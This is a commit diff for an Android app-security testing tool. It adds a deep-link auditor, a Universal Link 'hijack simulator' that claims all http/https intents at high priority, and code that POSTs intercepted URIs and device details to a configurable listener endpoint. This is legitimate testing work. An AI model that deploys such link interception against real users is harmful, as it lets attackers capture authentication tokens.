retro4hack
diff --git a/‎README.md‎
Lines changed: 8 additions & 1 deletion b/‎README.md‎
Lines changed: 8 additions & 1 deletion
diff --git a/‎app/src/main/AndroidManifest.xml‎
Lines changed: 24 additions & 0 deletions b/‎app/src/main/AndroidManifest.xml‎
Lines changed: 24 additions & 0 deletions
diff --git a/‎app/src/main/java/com/mopwn/app/DeeplinkAuditorActivity.kt‎
Lines changed: 593 additions & 0 deletions b/‎app/src/main/java/com/mopwn/app/DeeplinkAuditorActivity.kt‎
Lines changed: 593 additions & 0 deletions
diff --git a/‎app/src/main/java/com/mopwn/app/DeeplinkHijackSimulatorActivity.kt‎
Lines changed: 107 additions & 0 deletions b/‎app/src/main/java/com/mopwn/app/DeeplinkHijackSimulatorActivity.kt‎
Lines changed: 107 additions & 0 deletions
diff --git a/‎app/src/main/java/com/mopwn/app/GeneralToolsActivity.kt‎
Lines changed: 55 additions & 0 deletions b/‎app/src/main/java/com/mopwn/app/GeneralToolsActivity.kt‎
Lines changed: 55 additions & 0 deletions
diff --git a/‎app/src/main/java/com/mopwn/app/InspectPackageActivity.kt‎
Lines changed: 6 additions & 0 deletions b/‎app/src/main/java/com/mopwn/app/InspectPackageActivity.kt‎
Lines changed: 6 additions & 0 deletions
@@ -11,15 +11,22 @@ It's still in development and I will try to add as many functionalities as I can
 * Finds all the exported activities, giving the possibility to inject data and extras, call the activity with specific actions 
 * Decompiles the application classes using JADX external library
 * Search for secrets, hardcoded strings and indicators
+* Access the list of deeplinks and custom schemes, and test them
+* Hosts a little http server that helps in testing Universal Links 
 ### Root Required
 * Navigate the data of the target application, download any file you need to access it easily
 * Dump or share the APK(s) (including bundles)
 * Manage the installation and execution of your Frida Server
 * Shows the current foreground class in a permanent notification (if the service is running, clearly)
 
+## Current Limits
+* At the moment the server is only capable of understanding the requests from the Universal Links functionalities
+* The server hosted with the application itself only supports http and not https
+
 ## Troubleshooting
-When you clone your repository it will likely fail while building due to the missing sdk. local.properties is a file that should not be shared, so you will have to created by yourself. 
+* When you clone your repository it will likely fail while building due to the missing sdk. local.properties is a file that should not be shared, so you will have to created by yourself. 
 Just create local.properties in the root of the project and insert this line: sdk.dir=< path-to-SDK >
+* "I'm testing the deep links functionalities but I'm not able to hijack: it opens the link on the browser" -> In this case just set MoPWN as default browser, at the moment I didn't find any way to force the chooser to spawn while trying to hijack
 
 ---
 If you have any idea, feel free to create a pull request, suggest anything you would like to see on the application, or fork and do it yourself if you prefer
 
@@ -15,6 +15,7 @@
         android:allowBackup="false"
         android:debuggable="false"
         android:largeHeap="true"
+        android:usesCleartextTraffic="true"
         android:dataExtractionRules="@xml/data_extraction_rules"
         android:fullBackupContent="@xml/backup_rules"
         android:icon="@mipmap/ic_mopwn"
@@ -47,13 +48,36 @@
         <activity android:name=".GeneralToolsActivity" />
         <activity android:name=".FridaManagerActivity" />
         <activity android:name=".SecretsAuditorActivity" />
+        <activity android:name=".DeeplinkAuditorActivity" />
+        <activity android:name=".OobConsoleActivity" />
+        
+        <activity
+            android:name=".DeeplinkHijackSimulatorActivity"
+            android:exported="true"
+            android:label="MoPWN Hijack Simulator"
+            android:theme="@android:style/Theme.Translucent.NoTitleBar">
+            <intent-filter android:priority="999">
+                <action android:name="android.intent.action.VIEW" />
+                <category android:name="android.intent.category.DEFAULT" />
+                <category android:name="android.intent.category.BROWSABLE" />
+                <data android:scheme="http" />
+                <data android:scheme="https" />
+            </intent-filter>
+        </activity>
 
         <service 
             android:name=".ForegroundTrackerService"
             android:enabled="true"
             android:exported="false"
             android:foregroundServiceType="specialUse"
             tools:ignore="ForegroundServicePermission" />
+
+        <service 
+            android:name=".OobListenerService"
+            android:enabled="true"
+            android:exported="false"
+            android:foregroundServiceType="specialUse"
+            tools:ignore="ForegroundServicePermission" />
 
         <provider
             android:name="androidx.core.content.FileProvider"
 
@@ -0,0 +1,107 @@
+package com.mopwn.app
+
+import android.app.Activity
+import android.app.AlertDialog
+import android.content.SharedPreferences
+import android.graphics.Color
+import android.net.Uri
+import android.os.Build
+import android.os.Bundle
+import android.widget.TextView
+import android.widget.Toast
+import org.json.JSONObject
+import java.io.OutputStream
+import java.net.HttpURLConnection
+import java.net.URL
+
+class DeeplinkHijackSimulatorActivity : Activity() {
+
+    override fun onCreate(savedInstanceState: Bundle?) {
+        super.onCreate(savedInstanceState)
+        
+        // Make the container window completely transparent to show only the dialog overlay
+        window.decorView.setBackgroundColor(Color.TRANSPARENT)
+
+        val incomingUri: Uri? = intent.data
+        if (incomingUri == null) {
+            finish()
+            return
+        }
+
+        // Retrieve the configured endpoint URL from SharedPreferences
+        val prefs: SharedPreferences = getSharedPreferences("MoPwnPrefs", MODE_PRIVATE)
+        val defaultEndpoint = "http://127.0.0.1:1337/"
+        val endpointUrl = prefs.getString("oob_logger_endpoint", defaultEndpoint)?.trim() ?: defaultEndpoint
+
+        showInterceptDialog(incomingUri.toString(), endpointUrl)
+    }
+
+    private fun showInterceptDialog(uriStr: String, endpointUrl: String) {
+        val dialogView = layoutInflater.inflate(android.R.layout.simple_list_item_2, null)
+        val text1 = dialogView.findViewById<TextView>(android.R.id.text1)
+        val text2 = dialogView.findViewById<TextView>(android.R.id.text2)
+
+        text1.text = "Universal Link Intercepted"
+        text2.text = "URI: $uriStr\n\nDestination OOB: $endpointUrl\n\nClick 'Transmit' to dispatch captured tokens to your active listener."
+
+        AlertDialog.Builder(this, android.R.style.Theme_DeviceDefault_Dialog_Alert)
+            .setTitle("MoPWN Hijack Simulator")
+            .setView(dialogView)
+            .setCancelable(false)
+            .setPositiveButton("TRANSMIT") { dialog, _ ->
+                transmitPayload(uriStr, endpointUrl)
+                dialog.dismiss()
+            }
+            .setNegativeButton("DISCARD") { dialog, _ ->
+                Toast.makeText(this, "Hijacked payload discarded.", Toast.LENGTH_SHORT).show()
+                dialog.dismiss()
+                finish()
+            }
+            .show()
+    }
+
+    private fun transmitPayload(uriStr: String, endpointUrl: String) {
+        Thread {
+            var connection: HttpURLConnection? = null
+            try {
+                val url = URL(endpointUrl)
+                connection = url.openConnection() as HttpURLConnection
+                connection.requestMethod = "POST"
+                connection.setRequestProperty("Content-Type", "application/json")
+                connection.doOutput = true
+                connection.connectTimeout = 5000
+                connection.readTimeout = 5000
+
+                // Generate standard json diagnostic structure
+                val payload = JSONObject().apply {
+                    put("device", "${Build.MANUFACTURER} ${Build.MODEL} (Android ${Build.VERSION.RELEASE})")
+                    put("intercepted_uri", uriStr)
+                    put("timestamp", System.currentTimeMillis())
+                }
+
+                val body = payload.toString()
+                val os: OutputStream = connection.outputStream
+                os.write(body.toByteArray())
+                os.flush()
+                os.close()
+
+                val responseCode = connection.responseCode
+                runOnUiThread {
+                    if (responseCode in 200..299) {
+                        Toast.makeText(this, "🟢 Transmit Successful! Code $responseCode", Toast.LENGTH_LONG).show()
+                    } else {
+                        Toast.makeText(this, "⚠️ Transmit Failed: HTTP Code $responseCode", Toast.LENGTH_LONG).show()
+                    }
+                    finish()
+                }
+            } catch (e: Exception) {
+                runOnUiThread {
+                    Toast.makeText(this, "🔴 Network Error: ${e.message}", Toast.LENGTH_LONG).show()
+                    finish()
+                }
+            } finally {
+                connection?.disconnect()
+            }
+        }.start()
+    }
+}
@@ -17,6 +17,8 @@ import androidx.appcompat.app.AppCompatActivity
 import androidx.core.app.ActivityCompat
 import androidx.core.content.ContextCompat
 import com.google.android.material.switchmaterial.SwitchMaterial
+import android.content.ClipboardManager
+import android.content.ClipData
 import java.io.DataOutputStream
 
 class GeneralToolsActivity : AppCompatActivity() {
@@ -35,6 +37,10 @@ class GeneralToolsActivity : AppCompatActivity() {
     private lateinit var btnNavigateFrida: Button
     private lateinit var switchTracker: SwitchMaterial
 
+    private lateinit var tvGeneralOobStatus: TextView
+    private lateinit var tvGeneralOobEndpoint: TextView
+    private lateinit var btnNavigateOob: Button
+
     private var isRequestingPermission = false
 
     private val trackerStopReceiver = object : BroadcastReceiver() {
@@ -95,6 +101,11 @@ class GeneralToolsActivity : AppCompatActivity() {
         // Initialize Smart Switch for Active App & Class Tracker
         switchTracker = findViewById(R.id.switchTracker)
 
+        // Initialize OOB Free-to-use Views
+        tvGeneralOobStatus = findViewById(R.id.tvGeneralOobStatus)
+        tvGeneralOobEndpoint = findViewById(R.id.tvGeneralOobEndpoint)
+        btnNavigateOob = findViewById(R.id.btnNavigateOob)
+
         // Load Spec details
         loadDeviceSpecs()
 
@@ -104,6 +115,28 @@ class GeneralToolsActivity : AppCompatActivity() {
             startActivity(intent)
         }
 
+        btnNavigateOob.setOnClickListener {
+            val intent = Intent(this, OobConsoleActivity::class.java)
+            startActivity(intent)
+        }
+
+        btnNavigateOob.setOnLongClickListener {
+            val isRunning = OobListenerService.isServiceRunning
+            if (isRunning) {
+                val localIp = OobListenerService.getLocalIpAddress() ?: "127.0.0.1"
+                val endpoint = "http://$localIp:1337/"
+                
+                val clipboard = getSystemService(Context.CLIPBOARD_SERVICE) as ClipboardManager
+                val clip = ClipData.newPlainText("MoPWN Endpoint", endpoint)
+                clipboard.setPrimaryClip(clip)
+                
+                Toast.makeText(this, "🟢 Endpoint URL copied: $endpoint", Toast.LENGTH_SHORT).show()
+            } else {
+                Toast.makeText(this, "⚪ Server is offline. Start the server first to copy the endpoint.", Toast.LENGTH_SHORT).show()
+            }
+            true
+        }
+
         // Set the main Switch Listener
         switchTracker.setOnCheckedChangeListener(switchListener)
 
@@ -174,6 +207,9 @@ class GeneralToolsActivity : AppCompatActivity() {
         // Check Frida Server Status dynamically on entry/resume
         checkFridaStatus()
 
+        // Check OOB Server Status dynamically on entry/resume
+        checkOobServerStatus()
+        
         // Dynamically align Switch with actual background service execution status, 
         // avoiding racing alignments during notification runtime permission request flows
         if (!isRequestingPermission) {
@@ -309,4 +345,23 @@ class GeneralToolsActivity : AppCompatActivity() {
         }
         return output
     }
+
+    private fun checkOobServerStatus() {
+        val isRunning = OobListenerService.isServiceRunning
+        if (isRunning) {
+            tvGeneralOobStatus.text = "RUNNING"
+            tvGeneralOobStatus.setTextColor(Color.parseColor("#4CAF50"))
+            
+            val localIp = OobListenerService.getLocalIpAddress() ?: "127.0.0.1"
+            val endpoint = "http://$localIp:1337/"
+            tvGeneralOobEndpoint.text = endpoint
+            tvGeneralOobEndpoint.setTextColor(Color.parseColor("#4CAF50"))
+        } else {
+            tvGeneralOobStatus.text = "OFFLINE"
+            tvGeneralOobStatus.setTextColor(Color.parseColor("#757575"))
+            
+            tvGeneralOobEndpoint.text = "None (Stopped)"
+            tvGeneralOobEndpoint.setTextColor(Color.parseColor("#757575"))
+        }
+    }
 }
@@ -46,6 +46,12 @@ class InspectPackageActivity : AppCompatActivity() {
             startActivity(intent)
         }
 
+        findViewById<Button>(R.id.btnDeeplinkAuditor).setOnClickListener {
+            val intent = Intent(this, DeeplinkAuditorActivity::class.java)
+            intent.putExtra("PACKAGE_NAME", packageName)
+            startActivity(intent)
+        }
+
 
         findViewById<Button>(R.id.btnDumpApk).setOnClickListener {
             extractApk(packageName, share = false)